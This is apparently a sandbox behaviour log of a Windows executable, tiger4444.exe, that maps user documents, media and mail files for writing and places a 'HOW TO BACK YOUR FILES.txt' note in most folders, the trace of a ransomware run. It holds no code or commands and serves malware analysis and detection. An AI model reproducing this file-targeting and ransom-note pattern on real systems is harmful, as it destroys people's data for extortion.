Map C:\Users\FD1HVy\Pictures\Saved Pictures\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Pictures\Camera Roll\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\OneDrive\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Music\14B5f5HX.m4a process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\epqIgxA0WzcL_N3FRi.m4a process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\ivAqh4BdXoB0En.m4a process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\pKN8kzf02i2Z-2YwQdYf.mp3 process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\XaND DoJCBA3Xf.mp3 process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Music\_MAxegZNMc9ssCROLe\rsJ9UPU.wav process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\_MAxegZNMc9ssCROLe\wXxWLXtHA6IWwzbkTvK.m4a process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\_MAxegZNMc9ssCROLe\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Music\yxGMwmgC\dOlY5mI8x96ejt4.m4a process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\yxGMwmgC\hqVpFTG9IIW eeHIf0.wav process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\yxGMwmgC\iyvNor3BCpFxS.mp3 process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\yxGMwmgC\T4BI1N3Y4nE.m4a process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\yxGMwmgC\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Music\yxGMwmgC\IUdpHuiNoyTnhg6M\b1MCgDF7JU.wav process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\yxGMwmgC\IUdpHuiNoyTnhg6M\RZMqfkHjGC7Ywnfi.wav process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\yxGMwmgC\IUdpHuiNoyTnhg6M\_9r81igxQbjAOcgmhEV.wav process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\yxGMwmgC\IUdpHuiNoyTnhg6M\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\2FpKVPISO.mp3 process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\5pycqsYyh9jtXU4a.mp3 process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\926rqjMJjcledBP-.m4a process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\H9vaiExm-o.mp3 process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\OUfb1R.wav process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\u3Lej26cURF7pFaUavmI.wav process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\X9wKF.m4a process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\Ylq3.m4a process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\Wfhv\cJ70uWo2V.m4a process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\Wfhv\gNF41DnE96kMsiC.mp3 process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\Wfhv\Z2GhDV1FaIXkNy.m4a process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\Wfhv\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\NV_iQ\9oZvTZiqj1T2ND.wav process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\NV_iQ\osWp2.mp3 process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\NV_iQ\U_ga_WJrGJ-jDmjIG.wav process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\NV_iQ\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\fRm4zP.wav process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\FSplmPyv3.m4a process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\YWaVCyXnxBoBbdx.m4a process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\_MbUJDIbnNB86DdwXKQn.wav process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\PkaVAmyKozGT3xgCy\geOqCbV8uwQiJY9.mp3 process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\PkaVAmyKozGT3xgCy\PKDoJjf.mp3 process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\PkaVAmyKozGT3xgCy\vRwHl.m4a process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\PkaVAmyKozGT3xgCy\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\JvO3tXgHMCsM-\D1biJ0M12k7D5tV.mp3 process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\JvO3tXgHMCsM-\FGCqab 6Q9IrvSbP.mp3 process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\JvO3tXgHMCsM-\Oddm UVF74ixYdV9S.m4a process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\JvO3tXgHMCsM-\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Links\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Favorites\Bing.url process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Favorites\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Favorites\Links\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Downloads\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Documents\3 jiOxfC.xlsx process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\cuZF8zNtkH1ph ibNaP.docx process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\Database1.accdb process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\dhSD1u3DH.odt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\dZQ_mjHLDjsbVneC6cd.docx process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\EAok5ewOXNobQh.ots process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\FJ6mUP3Il.pptx process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\fsJ8kTuOCLSl-C_JQct.xlsx process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\HWI6QLOj9su4aVLe9iXw.xlsx process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\IrhwLsePMUurM.docx process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\JHU0USB Z-UIYlMKL9Z.pptx process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\kJNpSxm0FJ.docx process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\NojVjWHIt.docx process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\oLihILFnIluq9HK.xlsx process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\qX7qJ7WfX.pptx process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\sfR3PnODJm2Om4GAN.xlsx process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\siSo J5a.csv process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\zGVRPL4IiUF2BCKlPu.pptx process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\_FMzdb HzQF-E.pptx process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\_VM7P01h9hZnAJlar.odt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Documents\Outlook Files\kkcie@kdj.kd.pst process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\Outlook Files\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Documents\My Shapes\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Documents\My Shapes\_private\folder.ico process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\My Shapes\_private\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-0K PhNNHHadw-4-e.ppt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\CDDkVk.rtf process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\jMF5ZBp2kKj.odt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\TKlqgRD9 Nr6 m.pps process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\bO1p3mfPqljshov1\NHEaUnME.rtf process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\bO1p3mfPqljshov1\ulXMy6BOucJen4sW.ppt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\bO1p3mfPqljshov1\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\bO1p3mfPqljshov1\UQBqZ\n-412MXR6-L.pdf process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\bO1p3mfPqljshov1\UQBqZ\oCaEFK.pps process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\bO1p3mfPqljshov1\UQBqZ\xEqwtSKV7zLSf.pps process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\bO1p3mfPqljshov1\UQBqZ\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\B5abvTlhU7kaxv-9\0ilze62eyGGp8o2xbiCL.pps process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\B5abvTlhU7kaxv-9\7Zjtx91ByGcvrFKaZy.xls process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\B5abvTlhU7kaxv-9\Q9S3eEzzxB5rF.ots process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\B5abvTlhU7kaxv-9\SvK-1oG.docx process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\B5abvTlhU7kaxv-9\tYLtI.doc process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\B5abvTlhU7kaxv-9\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\8IgFx4zl3bMpZVF MD\ArOyoOdOI6imJTOdUQz.docx process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\8IgFx4zl3bMpZVF MD\FKzNXHAJ9H_X.rtf process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\8IgFx4zl3bMpZVF MD\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\8IgFx4zl3bMpZVF MD\CV 4F8bU8BkzH0h\I3HSL.pptx process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\8IgFx4zl3bMpZVF MD\CV 4F8bU8BkzH0h\x7LJ0ZYN8.odt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\8IgFx4zl3bMpZVF MD\CV 4F8bU8BkzH0h\yjNibne Et76JLFiG7Cj.rtf process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\8IgFx4zl3bMpZVF MD\CV 4F8bU8BkzH0h\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\iAgvW_.odp process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\JBjCvXV vQ.ppt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\RMDD_1hr.pdf process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\VfPvOBGOXfF2YuC.pptx process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\yBFSczQSgZ4zH_5p0CuH.ots process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\FZyK4S\EBFJF68kMJmPOC6j8o0H.docx process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\FZyK4S\rMkT8DHQ-.pdf process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\FZyK4S\TUjgZaL_tfSm-QNcJ8.ods process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\FZyK4S\xAZVXzPkRJ6.pptx process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\FZyK4S\zOFtTnfv6Q_MW3.rtf process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\FZyK4S\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\8TIq-qdhatQQU4\9ehLACIDaiZ9PxP8jeTb.odp process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\8TIq-qdhatQQU4\jJADNxp7L0AwE.rtf process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\8TIq-qdhatQQU4\UhpMWGFi.pps process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\8TIq-qdhatQQU4\x _R5.pdf process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\8TIq-qdhatQQU4\y6ubXI-WBD.pptx process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\8TIq-qdhatQQU4\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Desktop\3-C44ag206r7-7a-u.jpg process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Desktop\3htk4ngR.wav process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Desktop\5j3J4t3qofV.wav process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
